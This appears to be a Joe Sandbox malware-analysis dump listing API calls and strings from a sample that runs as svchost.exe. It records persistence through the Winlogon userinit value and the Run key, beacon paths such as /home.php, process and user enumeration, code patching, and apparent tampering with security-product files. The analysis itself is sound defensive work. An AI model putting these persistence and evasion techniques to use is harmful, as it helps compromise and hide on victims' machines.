                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C731F4
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C731F8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73210
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7326F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C7329E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732A7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732B3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732B6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732C6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732C9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,7744C3F0), ref: 02C732D5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,75572F70,7744C3F0), ref: 02C732D8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                            • String ID: %02X$%48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33$%s!%s!%08X$user!965543!09C06683$InstallDate$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                            • API String ID: 2057876665-3509500721
                                                                                                                                                                                                            • Opcode ID: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                            • Instruction ID: 75e312b9e7ffe3699f6f3bebc38541af77f4571995b644781dfedd3aa8380b83
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d38a91d1cd869895afa98e9374dd89f463f3843179b0f578fd39ad50b8d3b4bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A51C6B1E40295ABDB11CBA59C89FEBBBBCEF84704F0445D5E905E7141E7709A048BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88DF6
                                                                                                                                                                                                            • GetThreadPriority.KERNEL32(00000000,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88DFD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C88E06
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000040,?,?,02C890E0,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C88E27
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02C88E46
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02C88E62
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02C88E78
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02C88E86
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88E91
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02C88EA4
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02C88EB5
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02C88EC4
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02C88ED3
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02C88EE2
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000006,?), ref: 02C88EEA
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02C88EFD
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02C88F0E
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02C88F1D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02C88F29
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02C88F33
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F3B
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F42
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2984368831-0
                                                                                                                                                                                                            • Opcode ID: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                            • Instruction ID: f67128f16ff17653a9e34e1d7b9161699e35eac166b0b198bcee514057c584d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3f7dda0078a9e01edefd51bce3e908dce26cac30e1425f2bbab246dbd9780e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13517371941219EFE711AF74CC46FAE77ACFF49310F154928F986E3180DB3899518BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74413
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,755735B0,00000000), ref: 02C7441E
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02C74441
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7445D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C74477
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C744B0
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C744B7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C744CB
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02C744FC
                                                                                                                                                                                                            • GetModuleFileNameExA.KERNELBASE(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02C74513
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7457C
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,?), ref: 02C7458B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                             • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                            • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                            • API String ID: 3808533164-4214784430
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02C96C96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationType
                                                                                                                                                                                                            • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                            • API String ID: 4064226416-1748840775
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strstrstrtol
                                                                                                                                                                                                            • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                            • API String ID: 600650289-3097137778
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82431
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8244C
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,75570F00,00000000,00000000), ref: 02C82466
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,75570F00,00000000,00000000), ref: 02C8247C
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                              • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                              • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                              • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824CB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824D2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824DE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824E5
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000001,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,75570F00), ref: 02C82539
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?,?,75570F00,00000000,00000000), ref: 02C82546
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82584
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82587
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82593
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82596
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: /topic.php
                                                                                                                                                                                                            • API String ID: 870369024-224703247
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C88C7A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C88C87
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02C88CA4
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000188F0,?,00000000,00000000), ref: 02C88CED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C88D05
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C88D16
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C88D28
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C88D40
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C88D60
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C88DAA
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C88DB7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • name=%s&port=%u, xrefs: 02C88D4F
                                                                                                                                                                                                            • %48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33, xrefs: 02C88D4A
                                                                                                                                                                                                            • SystemDrive, xrefs: 02C88C75
                                                                                                                                                                                                            • /home.php, xrefs: 02C88D91
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: %48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                            • API String ID: 1291007772-1242199463
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,755735B0,00000000,?,?,?,?,02C74FC0,00000000), ref: 02C74677
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746BD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746C4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C746D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7471D
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000), ref: 02C74754
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02C74FC0,02C74FC1,000000EA,00000000), ref: 02C7478C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C7479F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C747A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C747AF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C747B2
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C747C5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess$Buffer$AllocDisplayFileInformationQueryValidateWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: %S$netuser{
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C733EE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 02C733E4
                                                                                                                                                                                                            • SystemDrive, xrefs: 02C7334F
                                                                                                                                                                                                            • C:\Windows\apppatch\svchost.exe, xrefs: 02C733C4, 02C733FB
                                                                                                                                                                                                            • userinit, xrefs: 02C73406
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C733AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                            • userinit, xrefs: 00402918
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02C93B87
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 02C93BFA
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 02C93C1C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 02C93C28
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 02C93C36
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
